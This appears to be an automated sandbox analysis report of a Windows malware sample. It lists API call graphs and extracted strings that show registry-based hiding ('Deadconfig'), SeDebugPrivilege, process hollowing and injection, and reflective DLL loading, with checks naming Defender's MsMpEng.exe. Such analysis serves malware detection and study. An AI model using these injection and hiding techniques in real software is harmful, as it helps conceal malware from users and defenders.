2e86a0995f0 Concurrency::cancel_current_task 2 API calls 7650->7651 7652 2e86a097ccb 7651->7652 7654 2e86a09962c RtlPcToFileHeader 7653->7654 7655 2e86a09960f 7653->7655 7656 2e86a099653 RaiseException 7654->7656 7657 2e86a099644 7654->7657 7655->7654 7656->7648 7657->7656 7659 2e86a094374 7658->7659 7660 2e86a094397 7658->7660 7659->7660 7672 2e86a093e00 7659->7672 7661 2e86a0943cd 7660->7661 7678 2e86a093f30 7660->7678 7663 2e86a0943fd 7661->7663 7667 2e86a093f30 2 API calls 7661->7667 7665 2e86a094433 7663->7665 7668 2e86a093e00 3 API calls 7663->7668 7666 2e86a09444f 7665->7666 7669 2e86a093e00 3 API calls 7665->7669 7670 2e86a093f30 2 API calls 7666->7670 7671 2e86a09446b 7666->7671 7667->7663 7668->7665 7669->7666 7670->7671 7671->7638 7673 2e86a093e21 _invalid_parameter_noinfo 7672->7673 7674 2e86a093e76 VirtualQuery 7673->7674 7675 2e86a093e90 7673->7675 7676 2e86a093eaa VirtualAlloc 7673->7676 7674->7673 7674->7675 7675->7660 7676->7675 7677 2e86a093edb GetLastError 7676->7677 7677->7673 7677->7675 7681 2e86a093f48 _invalid_parameter_noinfo 7678->7681 7679 2e86a093fb7 7679->7661 7680 2e86a093f9d VirtualQuery 7680->7679 7680->7681 7681->7679 7681->7680 7682 2e86a094002 GetLastError 7681->7682 7682->7681 7684 2e86a09764b 7683->7684 7685 2e86a097661 SetLastError 7684->7685 7686 2e86a09766f 7684->7686 7685->7686 7686->7643 7687 2e86a09fa54 7690 2e86a09cd58 7687->7690 7691 2e86a09cdaa 7690->7691 7692 2e86a09cd65 7690->7692 7696 2e86a09b41c 7692->7696 7697 2e86a09b432 7696->7697 7698 2e86a09b42d 7696->7698 7700 2e86a09d728 _set_errno_from_matherr 6 API calls 7697->7700 7706 2e86a09b43a 7697->7706 7699 2e86a09d6e0 _set_errno_from_matherr 6 API calls 7698->7699 7699->7697 7701 2e86a09b451 7700->7701 7702 2e86a09b980 _set_errno_from_matherr 13 API calls 7701->7702 7701->7706 7704 2e86a09b464 7702->7704 7707 2e86a09b482 7704->7707 7708 2e86a09b472 7704->7708 7709 2e86a09b4b4 7706->7709 7739 2e86a09acb4 7706->7739 7711 2e86a09d728 _set_errno_from_matherr 6 API calls 7707->7711 7710 2e86a09d728 _set_errno_from_matherr 6 API calls 7708->7710 7721 2e86a09cae0 7709->7721 7712 2e86a09b479 7710->7712 7713 2e86a09b48a 7711->7713 7716 2e86a09b9f8 __free_lconv_num 13 API calls 7712->7716 7714 2e86a09b4a0 7713->7714 7715 2e86a09b48e 7713->7715 7718 2e86a09b0b4 _set_errno_from_matherr 13 API calls 7714->7718 7717 2e86a09d728 _set_errno_from_matherr 6 API calls 7715->7717 7716->7706 7717->7712 7719 2e86a09b4a8 7718->7719 7719->7706 7720 2e86a09b9f8 __free_lconv_num 13 API calls 7719->7720 7720->7706 7833 2e86a09cca0 7721->7833 7723 2e86a09cb09 7848 2e86a09c7ec 7723->7848 7726 2e86a09cb23 7726->7691 7728 2e86a09cbcf 7730 2e86a09b9f8 __free_lconv_num 13 API calls 7728->7730 7730->7726 7733 2e86a09cbca 7734 2e86a09b960 _set_errno_from_matherr 13 API calls 7733->7734 7734->7728 7735 2e86a09cc2c 7735->7728 7873 2e86a09c630 7735->7873 7736 2e86a09cbef 7736->7735 7737 2e86a09b9f8 __free_lconv_num 13 API calls 7736->7737 7737->7735 7748 2e86a09dd28 7739->7748 7774 2e86a09dce0 7748->7774 7779 2e86a09aebc EnterCriticalSection 7774->7779 7834 2e86a09ccc3 7833->7834 7835 2e86a09cccd 7834->7835 7888 2e86a09aebc EnterCriticalSection 7834->7888 7838 2e86a09cd3f 7835->7838 7839 2e86a09acb4 33 API calls 7835->7839 7838->7723 7841 2e86a09cd57 7839->7841 7844 2e86a09b41c 33 API calls 7841->7844 7847 2e86a09cdaa 7841->7847 7845 2e86a09cd94 7844->7845 7846 2e86a09cae0 43 API calls 7845->7846 7846->7847 7847->7723 7889 2e86a09ad0c 7848->7889 7851 2e86a09c81e 7853 2e86a09c823 GetACP 7851->7853 7854 2e86a09c833 7851->7854 7852 2e86a09c80c GetOEMCP 7852->7854 7853->7854 7854->7726 7855 2e86a09af2c 7854->7855 7856 2e86a09af77 7855->7856 7861 2e86a09af3b _set_errno_from_matherr 7855->7861 7858 2e86a09b960 _set_errno_from_matherr 13 API calls 7856->7858 7857 2e86a09af5e HeapAlloc 7859 2e86a09af75 7857->7859 7857->7861 7858->7859 7859->7728 7862 2e86a09cdd4 7859->7862 7860 2e86a099e44 _set_errno_from_matherr 2 API calls 7860->7861 7861->7856 7861->7857 7861->7860 7863 2e86a09c7ec 35 API calls 7862->7863 7864 2e86a09cdff 7863->7864 7866 2e86a09ce3c IsValidCodePage 7864->7866 7870 2e86a09ce7f _invalid_parameter_noinfo 7864->7870 7865 2e86a097d60 _handle_error 8 API calls 7867 2e86a09cbc3 7865->7867 7868 2e86a09ce4d 7866->7868 7866->7870 7867->7733 7867->7736 7869 2e86a09ce84 GetCPInfo 7868->7869 7872 2e86a09ce56 _invalid_parameter_noinfo 7868->7872 7869->7870 7869->7872 7870->7865 7921 2e86a09c8fc 7872->7921 7995 2e86a09aebc EnterCriticalSection 7873->7995 7890 2e86a09ad2b 7889->7890 7891 2e86a09ad30 7889->7891 7890->7851 7890->7852 7891->7890 7892 2e86a09b348 33 API calls 7891->7892 7893 2e86a09ad4b 7892->7893 7897 2e86a09e604 7893->7897 7898 2e86a09e619 7897->7898 7899 2e86a09ad6e 7897->7899 7898->7899 7905 2e86a09eaac 7898->7905 7901 2e86a09e638 7899->7901 7902 2e86a09e660 7901->7902 7903 2e86a09e64d 7901->7903 7902->7890 7903->7902 7918 2e86a09cdb8 7903->7918 7906 2e86a09b348 33 API calls 7905->7906 7907 2e86a09eabb 7906->7907 7908 2e86a09eb06 7907->7908 7917 2e86a09aebc EnterCriticalSection 7907->7917 7908->7899 7919 2e86a09b348 33 API calls 7918->7919 7920 2e86a09cdc1 7919->7920 7922 2e86a09c939 GetCPInfo 7921->7922 7931 2e86a09ca2f 7921->7931 7927 2e86a09c94c 7922->7927 7922->7931 7923 2e86a097d60 _handle_error 8 API calls 7924 2e86a09cac8 7923->7924 7924->7870 7932 2e86a09f514 7927->7932 7931->7923 7933 2e86a09ad0c 33 API calls 7932->7933 7934 2e86a09f556 7933->7934 7952 2e86a09d144 7934->7952 7953 2e86a09d14c MultiByteToWideChar 7952->7953 8761 2e86a09d354 8762 2e86a09d393 8761->8762 8763 2e86a09d376 8761->8763 8765 2e86a09d39d 8762->8765 8770 2e86a09fa6c 8762->8770 8763->8762 8764 2e86a09d384 8763->8764 8766 2e86a09b960 _set_errno_from_matherr 13 API calls 8764->8766 8777 2e86a09faa8 8765->8777 8769 2e86a09d389 _invalid_parameter_noinfo 8766->8769 8771 2e86a09fa75 8770->8771 8772 2e86a09fa8e HeapSize 8770->8772 8773 2e86a09b960 _set_errno_from_matherr 13 API calls 8771->8773 8774 2e86a09fa7a 8773->8774 8775 2e86a09b840 _invalid_parameter_noinfo 30 API calls 8774->8775 8776 2e86a09fa85 8775->8776 8776->8765 8778 2e86a09fac7 8777->8778 8779 2e86a09fabd 8777->8779 8781 2e86a09facc 8778->8781 8787 2e86a09fad3 _set_errno_from_matherr 8778->8787 8780 2e86a09af2c 14 API calls 8779->8780 8785 2e86a09fac5 8780->8785 8782 2e86a09b9f8 __free_lconv_num 13 API calls 8781->8782 8782->8785 8783 2e86a09fb06 HeapReAlloc 8783->8785 8783->8787 8784 2e86a09fad9 8786 2e86a09b960 _set_errno_from_matherr 13 API calls 8784->8786 8785->8769 8786->8785 8787->8783 8787->8784 8788 2e86a099e44 _set_errno_from_matherr 2 API calls 8787->8788 8788->8787 7996 2e86a099448 8003 2e86a0998c4 7996->8003 7999 2e86a099455 8019 2e86a099bac 8003->8019 8006 2e86a099451 8006->7999 8008 2e86a099858 8006->8008 8007 2e86a0998f8 __vcrt_uninitialize_locks DeleteCriticalSection 8007->8006 8033 2e86a099a80 8008->8033 8024 2e86a099930 8019->8024 8022 2e86a099bf7 InitializeCriticalSectionAndSpinCount 8023 2e86a0998dc 8022->8023 8023->8006 8023->8007 8025 2e86a099974 try_get_function 8024->8025 8031 2e86a099a4a 8024->8031 8026 2e86a0999a2 LoadLibraryExW 8025->8026 8027 2e86a099a39 GetProcAddress 8025->8027 8025->8031 8032 2e86a0999e5 LoadLibraryExW 8025->8032 8028 2e86a0999c3 GetLastError 8026->8028 8029 2e86a099a19 8026->8029 8027->8031 8028->8025 8029->8027 8030 2e86a099a30 FreeLibrary 8029->8030 8030->8027 8031->8022 8031->8023 8032->8025 8032->8029 8034 2e86a099930 __vcrt_InitializeCriticalSectionEx 5 API calls 8033->8034 8035 2e86a099aa5 TlsAlloc 8034->8035 8386 2e86a091ac8 8393 2e86a091628 GetProcessHeap HeapAlloc 8386->8393 8388 2e86a091ade Sleep 8389 2e86a091628 50 API calls 8388->8389 8390 2e86a091ad7 8389->8390 8390->8388 8392 2e86a091598 StrCmpIW StrCmpW 8390->8392 8444 2e86a0918b4 8390->8444 8392->8390 8461 2e86a091268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8393->8461 8395 2e86a091650 8462 2e86a091000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8395->8462 8397 2e86a091658 8463 2e86a091268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8397->8463 8399 2e86a091661 8464 2e86a091268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8399->8464 8401 2e86a09166a 8465 2e86a091268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8401->8465 8403 2e86a091673 8466 2e86a091000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8403->8466 8405 2e86a09167c 8467 2e86a091000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8405->8467 8407 2e86a091685 8468 2e86a091000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8407->8468 8409 2e86a09168e RegOpenKeyExW 8410 2e86a0916c0 RegOpenKeyExW 8409->8410 8411 2e86a0918a6 8409->8411 8412 2e86a0916e9 8410->8412 8413 2e86a0916ff RegOpenKeyExW 8410->8413 8411->8390 8469 2e86a0912bc RegQueryInfoKeyW 8412->8469 8415 2e86a091723 8413->8415 8416 2e86a09173a RegOpenKeyExW 8413->8416 8478 2e86a09104c RegQueryInfoKeyW 8415->8478 8419 2e86a091775 RegOpenKeyExW 8416->8419 8420 2e86a09175e 8416->8420 8423 2e86a0917b0 RegOpenKeyExW 8419->8423 8424 2e86a091799 8419->8424 8422 2e86a0912bc 16 API calls 8420->8422 8427 2e86a09176b RegCloseKey 8422->8427 8425 2e86a0917d4 8423->8425 8426 2e86a0917eb RegOpenKeyExW 8423->8426 8428 2e86a0912bc 16 API calls 8424->8428 8429 2e86a0912bc 16 API calls 8425->8429 8430 2e86a091826 RegOpenKeyExW 8426->8430 8431 2e86a09180f 8426->8431 8427->8419 8432 2e86a0917a6 RegCloseKey 8428->8432 8433 2e86a0917e1 RegCloseKey 8429->8433 8435 2e86a091861 RegOpenKeyExW 8430->8435 8436 2e86a09184a 8430->8436 8434 2e86a09104c 6 API calls 8431->8434 8432->8423 8433->8426 8437 2e86a09181c RegCloseKey 8434->8437 8439 2e86a091885 8435->8439 8440 2e86a09189c RegCloseKey 8435->8440 8438 2e86a09104c 6 API calls 8436->8438 8437->8430 8441 2e86a091857 RegCloseKey 8438->8441 8442 2e86a09104c 6 API calls 8439->8442 8440->8411 8441->8435 8443 2e86a091892 RegCloseKey 8442->8443 8443->8440 8483 2e86a0914a4 8444->8483 8461->8395 8462->8397 8463->8399 8464->8401 8465->8403 8466->8405 8467->8407 8468->8409 8470 2e86a091327 GetProcessHeap HeapAlloc 8469->8470 8471 2e86a09148a RegCloseKey 8469->8471 8472 2e86a091352 RegEnumValueW 8470->8472 8473 2e86a091476 GetProcessHeap HeapFree 8470->8473 8471->8413 8475 2e86a0913a5 8472->8475 8473->8471 8474 2e86a09152c 2 API calls 8474->8475 8475->8472 8475->8473 8475->8474 8476 2e86a0913d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 8475->8476 8477 2e86a09141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 8475->8477 8476->8477 8477->8475 8479 2e86a0911b7 RegCloseKey 8478->8479 8482 2e86a0910bf 8478->8482 8479->8416 8480 2e86a0910cf RegEnumValueW 8480->8482 8481 2e86a091150 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 8481->8482 8482->8479 8482->8480 8482->8481 8484 2e86a0914e1 GetProcessHeap HeapFree GetProcessHeap HeapFree 8483->8484 8485 2e86a0914c1 GetProcessHeap HeapFree 8483->8485 8485->8484 8485->8485 8037 2e86a0a2a61 __scrt_dllmain_exception_filter 8891 2e86a09dbe4 8892 2e86a09dbf0 8891->8892 8894 2e86a09dc17 8892->8894 8895 2e86a09fc7c 8892->8895 8896 2e86a09fc81 8895->8896 8900 2e86a09fcbc 8895->8900 8897 2e86a09fca2 DeleteCriticalSection 8896->8897 8898 2e86a09fcb4 8896->8898 8897->8897 8897->8898 8899 2e86a09b9f8 __free_lconv_num 13 API calls 8898->8899 8899->8900 8900->8892 8901 1400031d8 8902 1400033f1 8901->8902 8903 1400031ff 8901->8903 8904 14000356d ReadFile 8902->8904 8905 1400033fd 8902->8905 8906 140003205 8903->8906 8907 14000335f GetProcessHeap HeapAlloc K32EnumProcesses 8903->8907 8908 14000329d 8904->8908 8909 140003597 8904->8909 8910 140003563 8905->8910 8911 140003406 8905->8911 8912 140003211 8906->8912 8913 140003356 ExitProcess 8906->8913 8907->8908 8929 14000339d 8907->8929 8909->8908 8916 1400035a4 GetProcessHeap HeapAlloc 8909->8916 8919 140001f68 22 API calls 8910->8919 8917 140003412 8911->8917 8918 140003508 8911->8918 8914 14000321a 8912->8914 8915 1400032be RegOpenKeyExW 8912->8915 8914->8908 8932 140003234 ReadFile 8914->8932 8924 140003327 8915->8924 8925 1400032eb RegDeleteValueW RegDeleteValueW RegDeleteValueW 8915->8925 8920 140001cdc 13 API calls 8916->8920 8921 140003454 8917->8921 8922 140003417 8917->8922 8923 1400020e8 ReadFile 8918->8923 8919->8908 8943 1400035dd 8920->8943 8977 1400020e8 8921->8977 8922->8908 8974 140002c64 8922->8974 8927 140003517 8923->8927 8961 140002168 SysAllocString SysAllocString CoInitializeEx 8924->8961 8925->8924 8926 140001854 31 API calls 8926->8929 8927->8908 8939 1400020e8 ReadFile 8927->8939 8929->8908 8929->8926 8931 140003333 8936 140002168 9 API calls 8931->8936 8932->8908 8937 14000325e 8932->8937 8933 140003612 GetProcessHeap HeapFree 8933->8908 8942 14000333f 8936->8942 8937->8908 8948 140001854 31 API calls 8937->8948 8945 14000352e 8939->8945 8940 14000346b ReadFile 8940->8908 8941 140003493 8940->8941 8941->8908 8946 1400034a0 GetProcessHeap HeapAlloc ReadFile 8941->8946 8969 140001f68 GetProcessHeap HeapAlloc 8942->8969 8943->8933 9009 140001ed8 8943->9009 8945->8908 8950 140003536 ShellExecuteW 8945->8950 8946->8933 8951 1400034e4 8946->8951 8953 140003284 8948->8953 8950->8908 8951->8933 8981 140002430 8951->8981 8956 140001854 31 API calls 8953->8956 8956->8908 8962 1400022ce SysFreeString SysFreeString 8961->8962 8963 1400021af CoInitializeSecurity 8961->8963 8962->8931 8964 1400021f7 CoCreateInstance 8963->8964 8965 1400021eb 8963->8965 8966 1400022c8 CoUninitialize 8964->8966 8967 14000222b VariantInit 8964->8967 8965->8964 8965->8966 8966->8962 8968 140002281 8967->8968 8968->8966 8970 140001cdc 13 API calls 8969->8970 8971 140001fa6 8970->8971 8972 140001fd4 GetProcessHeap HeapFree 8971->8972 8973 140001ed8 5 API calls 8971->8973 8973->8971 8975 1400020b8 2 API calls 8974->8975 8976 140002c79 8975->8976 8978 14000210c ReadFile 8977->8978 8979 14000212f 8978->8979 8980 140002149 8978->8980 8979->8978 8979->8980 8980->8908 8980->8940 8982 140002467 8981->8982 9006 140002917 8981->9006 8983 1400020b8 2 API calls 8982->8983 8986 140002476 8982->8986 8983->8986 8984 1400024d3 CreateProcessW 8984->8986 8985 1400028db OpenProcess 8985->8986 8987 1400028ee TerminateProcess 8985->8987 8986->8984 8986->8985 8988 1400020b8 GetModuleHandleA GetProcAddress 8986->8988 8989 140002726 VirtualAllocEx 8986->8989 8990 140002566 VirtualAllocEx 8986->8990 8995 140002845 VirtualAlloc 8986->8995 8996 140002685 VirtualAlloc 8986->8996 8997 1400027c1 WriteProcessMemory 8986->8997 9000 140002601 WriteProcessMemory 8986->9000 9005 1400028c1 ResumeThread 8986->9005 8986->9006 9007 14000264b VirtualProtectEx 8986->9007 9008 14000280b VirtualProtectEx 8986->9008 8987->8986 8988->8986 8989->8986 8991 140002756 WriteProcessMemory 8989->8991 8990->8986 8992 140002596 WriteProcessMemory 8990->8992 8991->8986 8993 140002778 VirtualProtectEx 8991->8993 8992->8986 8994 1400025b8 VirtualProtectEx 8992->8994 8993->8986 8994->8986 8995->8986 8999 140002864 Wow64GetThreadContext 8995->8999 8996->8986 8998 1400026a8 GetThreadContext 8996->8998 8997->8986 8998->8986 9002 1400026c8 WriteProcessMemory 8998->9002 8999->8986 9001 14000287f WriteProcessMemory 8999->9001 9000->8986 9001->8986 9003 1400028a3 Wow64SetThreadContext 9001->9003 9002->8986 9004 1400026f2 SetThreadContext 9002->9004 9003->8986 9004->8986 9005->8986 9005->9006 9006->8933 9007->8986 9008->8986 9010 140001f51 9009->9010 9011 140001ef7 OpenProcess 9009->9011 9010->8933 9011->9010 9012 140001f0f 9011->9012 9013 140002c04 2 API calls 9012->9013 9014 140001f2f 9013->9014 9015 140001f48 CloseHandle 9014->9015 9016 140001f3d CloseHandle 9014->9016 9015->9010 9016->9015 8486 2e86a095cd9 8487 2e86a095ce0 VirtualProtect 8486->8487 8488 2e86a095bf0 8487->8488 8489 2e86a095d09 GetLastError 8487->8489 8489->8488 8490 2e86a093ed9 8493 2e86a093e26 _invalid_parameter_noinfo 8490->8493 8491 2e86a093e90 8492 2e86a093e76 VirtualQuery 8492->8491 8492->8493 8493->8491 8493->8492 8494 2e86a093eaa VirtualAlloc 8493->8494 8494->8491 8495 2e86a093edb GetLastError 8494->8495 8495->8491 8495->8493

                                                        Executed Functions

                                                        Function 0000000140002D54 Relevance: 84.3, APIs: 36, Strings: 12, Instructions: 258registrymemorythreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Process$Heap$Create$CloseValue$CurrentHandleQuery$AllocFileFreeOpenSecurityThread$DescriptorModuleProtectTokenVirtual$AdjustConvertErrorExecuteInformationLastLibraryLocalLookupMappingPrivilegePrivilegesShellSleepStringViewlstrcmpi
                                                        • String ID: ?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$Deaddll32$Deaddll64$SOFTWARE$SOFTWARE\Deadconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
                                                        • API String ID: 3658652915-705066980
                                                        • Opcode ID: 09e549efbda8c35b39a76a366dbe8028c3cee4715c97da4422c7ce70c0244594
                                                        • Instruction ID: bfed91f18c334a7cc4a0b1e358a8adad7fcd43e68269cf6643d78abe2c04a47a
                                                        • Opcode Fuzzy Hash: 09e549efbda8c35b39a76a366dbe8028c3cee4715c97da4422c7ce70c0244594
                                                        • Instruction Fuzzy Hash: 4CC1F2B2200A4186EB26DF22F8547DA37A5FB8CBD9F814116FB4A43A75DF38C589C744
                                                        Function 0000000140001854 Relevance: 58.0, APIs: 29, Strings: 4, Instructions: 288memorystringnativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 45 140001854-140001899 OpenProcess 46 140001cbe-140001cda 45->46 47 14000189f-1400018b5 IsWow64Process 45->47 48 1400018b7-1400018c6 47->48 49 1400018c8 47->49 50 1400018ce-1400018da CloseHandle 48->50 49->50 50->46 51 1400018e0-1400018eb 50->51 51->46 52 1400018f1-140001900 51->52 53 140001912 52->53 54 140001902-140001907 52->54 56 140001914-140001916 53->56 54->46 55 14000190d-140001910 54->55 55->56 56->46 57 14000191c-140001932 OpenProcess 56->57 57->46 58 140001938-140001951 OpenProcess 57->58 59 1400019f1-140001a10 NtQueryInformationProcess 58->59 60 140001957-14000196e K32GetModuleFileNameExW 58->60 63 140001cb5-140001cb8 CloseHandle 59->63 64 140001a16-140001a1a 59->64 61 1400019a0-1400019ac CloseHandle 60->61 62 140001970-14000198b PathFindFileNameW lstrlenW 60->62 61->59 66 1400019ae-1400019c8 61->66 62->61 65 14000198d-14000199d StrCpyW 62->65 63->46 64->63 67 140001a20-140001a38 OpenProcessToken 64->67 65->61 69 1400019cd-1400019df StrCmpIW 66->69 67->63 68 140001a3e-140001a64 GetTokenInformation 67->68 70 140001ae1 68->70 71 140001a66-140001a6f GetLastError 68->71 69->63 72 1400019e5-1400019ef 69->72 74 140001ae8-140001af6 CloseHandle 70->74 71->70 73 140001a71-140001a85 LocalAlloc 71->73 72->59 72->69 73->70 75 140001a87-140001aad GetTokenInformation 73->75 74->63 76 140001afc-140001b03 74->76 77 140001acf 75->77 78 140001aaf-140001acd GetSidSubAuthorityCount GetSidSubAuthority 75->78 76->63 79 140001b09-140001b14 76->79 80 140001ad6-140001adf LocalFree 77->80 78->80 79->63 81 140001b1a-140001b24 79->81 80->74 82 140001b26-140001b30 81->82 83 140001b3f 81->83 82->63 84 140001b36-140001b3d 82->84 85 140001b43-140001b7b call 1400029a8 * 3 83->85 84->85 85->63 92 140001b81-140001ba1 call 1400029a8 StrStrA 85->92 95 140001ba3-140001bb3 92->95 96 140001bba-140001bdf call 1400029a8 * 2 92->96 95->92 97 140001bb5 95->97 96->63 102 140001be5-140001c0e VirtualAllocEx 96->102 97->63 102->63 103 140001c14-140001c2d WriteProcessMemory 102->103 103->63 104 140001c33-140001c55 call 140002c04 103->104 104->63 107 140001c57-140001c5f 104->107 107->63 108 140001c61-140001c6e WaitForSingleObject 107->108 109 140001caa-140001caf CloseHandle 108->109 110 140001c70-140001c84 GetExitCodeThread 108->110 109->63 111 140001c86-140001c8c 110->111 112 140001c8f-140001ca8 VirtualFreeEx 110->112 111->112 112->109
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
                                                        • String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
                                                        • API String ID: 2456419452-2628171563
                                                        • Opcode ID: 6ed84dbf6c60baabb87f5e27460d6d0a7eb95a1c4c3bfaadbfcf50804f83e4d3
                                                        • Instruction ID: 2def5684ad40d20a49040a85348fb744831477dd2d93b0325c4797c406c44bfc
                                                        • Opcode Fuzzy Hash: 6ed84dbf6c60baabb87f5e27460d6d0a7eb95a1c4c3bfaadbfcf50804f83e4d3
                                                        • Instruction Fuzzy Hash: 3BC16BB270464186EB66DF23F8907E923A5FB88BC4F444225EF4A47BA5DF38C985C744
                                                        Function 0000000140001CDC Relevance: 19.6, APIs: 13, Instructions: 131memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                        • String ID:
                                                        • API String ID: 4084875642-0
                                                        • Opcode ID: 5eedca2a6ebaa50de0a645c3a268b9ad974e8a0cc72b2613e158502b10b35cba
                                                        • Instruction ID: 2ef3b413823c79878d8bf4f714f1222c243dd995f8c3498a775b877731f91f2a
                                                        • Opcode Fuzzy Hash: 5eedca2a6ebaa50de0a645c3a268b9ad974e8a0cc72b2613e158502b10b35cba
                                                        • Instruction Fuzzy Hash: 135157B27116808AEB66DF63F8587EA22A1F78DBD8F404025EF4957764DF38C5868704
                                                        Function 00000001400022FC Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                        • String ID:
                                                        • API String ID: 3197395349-0
                                                        • Opcode ID: a824f9f1c73b8783bda4e66bfa56d47737030f3f51221f323701f0b802283d28
                                                        • Instruction ID: e0f80ed29c2beefa5853a1ece120277d3f59ab68b3310c2d3307c812b30976c9
                                                        • Opcode Fuzzy Hash: a824f9f1c73b8783bda4e66bfa56d47737030f3f51221f323701f0b802283d28
                                                        • Instruction Fuzzy Hash: 4D317CB2214791CAE761CF65F4807DE77A4F748798F40422AFB4947EA8DB78C258CB44
                                                        Function 0000000140001508 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\Deadconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-3864762265
                                                        • Opcode ID: 6fe6fd2fabdb69b81960e478b2bac1cdf4793581c5eb948de40915324fca4ae9
                                                        • Instruction ID: 4eaf67f6f9e92a82d90f2c5ff0c3a66959d997bd88fd83b2dd54c05b11918b05
                                                        • Opcode Fuzzy Hash: 6fe6fd2fabdb69b81960e478b2bac1cdf4793581c5eb948de40915324fca4ae9
                                                        • Instruction Fuzzy Hash: 6171C4B6210A5086EB22EF66F8507D923A4FB8CBC8F016125FB4D97A7ADF38C554C744
                                                        Function 0000000140002A14 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
